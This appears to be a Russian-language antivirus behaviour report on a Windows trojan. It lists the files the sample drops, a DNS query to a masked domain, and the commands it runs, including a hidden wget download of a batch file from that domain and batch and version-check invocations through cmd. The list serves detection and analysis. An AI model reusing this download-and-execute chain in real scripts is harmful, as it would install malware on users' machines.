Техническая информация
- %WINDIR%\a.bat
- %WINDIR%\curl\curl.exe
- %WINDIR%\wget\bin\wget.exe
- %WINDIR%\wget\bin\libintl3.dll
- %WINDIR%\wget\bin\libssl32.dll
- %WINDIR%\wget\bin\libeay32.dll
- %WINDIR%\wget\bin\libiconv2.dll
- %WINDIR%\set-up.exe
- %TEMP%\is-jibe7.tmp\set-up.tmp
- %TEMP%\is-ko8ul.tmp\_isetup\_regdll.tmp
- %TEMP%\is-ko8ul.tmp\_isetup\_setup64.tmp
- %TEMP%\is-ko8ul.tmp\_isetup\_shfoldr.dll
- DNS ASK 88##.space
- '%WINDIR%\set-up.exe'
- '%TEMP%\is-jibe7.tmp\set-up.tmp' /SL5="$90214,22327755,53248,%WINDIR%\Set-up.exe"
- '%WINDIR%\wget\bin\wget.exe' -c -P "%WINDIR%" "http://88##.space/rs/dy/p2/gitgun/b.bat" --referer="alpha"
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\a.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\a.bat" "
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" ver "
- '%WINDIR%\syswow64\findstr.exe' /IL "5.1."